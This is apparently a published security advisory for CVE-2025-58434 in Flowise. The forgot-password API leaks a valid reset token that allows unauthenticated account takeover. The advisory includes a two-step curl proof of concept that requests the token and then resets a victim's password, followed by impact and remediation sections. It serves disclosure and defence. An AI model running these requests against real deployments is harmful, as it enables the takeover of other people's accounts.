CVE-2025-58434
Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover
Description
### Summary The `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**. This vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API. **CVSS v3.1 Base Score:** **9.8 (Critical)** **Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` --- ### Details * The endpoint `/api/v1/account/forgot-password` accepts an email address as input. * Instead of only sending a reset email, the API **responds directly with sensitive user details**, including: * User ID, name, email, hashed credential, status, timestamps. * **A valid `tempToken` and its expiry**, which is intended for password reset. * This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction. * Exploitation requires only the victim’s email address, which is often guessable or discoverable. * Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover. This effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email. --- ### PoC 1. **Request a reset token for the victim** ```bash curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d '{"user":{"email":"<[email protected]>"}}' ``` **Response (201 Created):** ```json { "user": { "id": "<redacted-uuid>", "name": "<redacted>", "email": "<[email protected]>", "credential": "<redacted-hash>", "tempToken": "<redacted-tempToken>", "tokenExpiry": "2025-08-19T13:00:33.834Z", "status": "active" } } ``` 2. **Use the exposed `tempToken` to reset the password** ```bash curl -i -X POST https://<target>/api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d '{ "user":{ "email":"<[email protected]>", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }' ``` **Expected Result:** `200 OK` The victim’s account password is reset, allowing full login. --- ### Impact * **Type:** Authentication bypass / Insecure direct object exposure. * **Impact:** * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address. * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**. * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets. * High likelihood of exploitation since no prior access or user interaction is required. --- ### Recommended Remediation * **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. * Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. * Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). * Apply the same fixes to **both cloud and self-hosted/local deployments**. * Log and monitor password reset requests for suspicious activity. * Consider multi-factor verification for sensitive accounts. Credit --- ⚠️ This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**. ---